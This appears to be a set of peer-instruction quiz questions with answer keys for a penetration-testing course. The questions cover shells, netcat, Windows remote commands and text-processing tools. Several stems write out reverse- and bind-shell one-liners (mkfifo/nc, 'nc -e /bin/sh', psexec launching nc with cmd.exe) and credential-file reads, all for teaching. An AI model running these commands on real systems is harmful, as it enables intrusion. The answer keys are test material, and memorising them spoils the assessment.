Penetration Testing & Network Defense Basics/Preliminaries                     Peer Instruction Questions for Cybersecurity: Pentesting by William E. Johnson, Allison Luzader, Irfan Ahmed is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.

What is a shell? A program that allows a user to display colorized output, clear and redraw the screen, etc. A program that allows a user to send raw commands (stdin) and get a raw response back (stdout) A program that contains a terminal and used to provide additional features to the terminal An exploitation mechanism that allows code to inject itself into a running process A program used to encapsulate and isolate a running binary through emulated system calls (such as Wine) Answer: B Category: Shell vs. Term

What is a terminal? A program that encapsulates a shell to provide more features such as colorized output and the ability to redraw the screen A program that allows a user to send raw commands (stdin) and get a raw response back (stdout) A program that facilitates remote access between machines A program used to encapsulate and isolate a running binary through emulated system calls (such as Wine) A program that allows remote termination of running processes Answer: A Category: Shell vs. Term

What does this pair of commands best accomplish What does this pair of commands best accomplish? mkfifo pipe /bin/sh 0<pipe | nc [pentester IP] 1234 1>pipe Create a local netcat server that serves a bash instance Run a shell script called “pipe” and serve it to a listener on the pentester’s IP Redirect stdin and stdout of a bash instance to a listener on the pentester’s IP Access stdin and stdout of a remotely running bash instance on the local pentester’s IP using a named pipe Answer: C Category: Simple proxy

You’ve established remote shell access to a machine with Netcat You’ve established remote shell access to a machine with Netcat. Which of these commands will not function? cat /etc/passwd whoami more /etc/passwd hostname id Answer: C Category: Shell vs. Term

You’ve established remote shell access to a machine with Netcat You’ve established remote shell access to a machine with Netcat. Which of these commands will function? more /etc/passwd vim /etc/passwd cat /etc/passwd less /etc/passwd top /etc/passwd Answer: C Category: Shell vs. term

You need terminal access to a remote machine to make use of a particular application. Assuming the machine has servers for each of these, which of these utilities will best provide that access? Telnet Netcat tsh SSH A or D Answer: D Category: Shell vs. Term

What does this command accomplish What does this command accomplish? C:\> for /L %%i in (1,1,255) do sc \\192.168.1.%%i query Attempt to connect with SMB to machines on 192.168.1.0/24 and list their running services in a command line Attempt to connect with SMB to machines on 192.168.1.0/24 and list their open ports in a command line Attempt to connect with SMB to machines on 192.168.1.0/24 and list their running services in a .bat script Attempt to connect with SMB to machines on 192.168.1.0/24 and list their open ports in a .bat script Answer: C Maybe this is too much info, but key pieces of information are the variable with two “%%”s indicating this belongs to a script, and sc query queries services Category: Remote access

What does this command best accomplish? C:\> wmic /node:137.30.126.111 /user:administrator /password:password process list full Send full process information to remote node 137.30.126.111 Receive full process information from node 137.30.126.111 Receive full process information for processes started by user “administrator” from 137.30.126.111 Send full process information for processes started by user “administrator” to 137.30.126.111 Answer: B Source: https://www.sans.org/security-resources/sec560/windows_command_line_sheet_v1.pdf Category: Remote access

What does this command accomplish? nc –v –w 2 137.30.126.111 750 Scan port 750 on 137.30.126.111 Open a bind shell on 137.30.126.111 for 750 seconds Access a Netcat listener at 137.30.126.111 on port 750 Create a reverse shell and send to a remote listener at 137.30.126.111 on port 750 Answer: A Category: Port scanning

What does this command accomplish? nc –e /bin/sh 137.30.126.111 750 Scan port 750 on 137.30.126.111 Open a bind shell on 137.30.126.111 for 750 seconds Access a Netcat listener at 137.30.126.111 on port 750 Create a reverse shell and send to a remote listener at 137.30.126.111 on port 750 Answer: D Category: Reverse shell

What does the following command best accomplish. C:\> psexec \\137 What does the following command best accomplish? C:\> psexec \\137.30.126.111 -u myuser –p mypassword C:\nc.exe –l –p 1234 –e cmd.exe Create a bind shell on the local Windows machine that requires a user login Create a reverse shell on the local Windows machine that automatically logs into 137.30.126.111 to provide the shell Log in to and create a bind shell on 137.30.126.111 Log into a reverse shell that was provided to the local machine from 137.30.126.111 Answer: C Category: Bind shell

You’re running this awk command against text output from a recon framework. What are the results? awk -F"," '{print $1, $3, $4}' results.out Insert commas after columns 1, 3, and 4 in the results file Print columns 1, 3, and 4 of a CSV results file Combine columns 1, 3, and 4 of each CSV file in the current directory and print output to results.out Insert commas between columns 1, 3, and 4 and print those to results.out Answer: B Category: awk

You’re running this sed command against a plaintext file You’re running this sed command against a plaintext file. What does it accomplish? sed 's/,/\ /g’ input.txt Add a comma followed by a space between the first two tokens in the file Add a comma followed by a space between each token in the file Replace all spaces with commas in the file Replace the first space with a comma in the file Replace all commas with spaces in the file Answer: E Category: sed

What does this command accomplish. grep 137. 30. 120. 1 file What does this command accomplish? grep 137.30.120.1 file.txt | sed 's/,/\ /g’| awk ‘{print $4}’ > file_.txt Run awk on file_.txt to isolate the 4th column, replace any extraneous commas with spaces, and only print lines that contain “137.30.120.1”, saving to file.txt Find lines in file.txt that contain “137.30.120.1”, replace all commas with spaces, and then print the 4th column to file_.txt Find file.txt on 137.30.120.1, replace all commas in the file with spaces, and print the fourth column out to file_.txt Isolate the fourth column of file_.txt, replace extraneous commas with spaces, and save it to the found file.txt file on 137.30.120.1 Answer: B Category: grep, awk, sed

Given a plaintext output file from a port scanner you’ve run, which of these tools will best help you find sections in the file based on some common pattern? sed awk grep bind A and D Answer: C Category: grep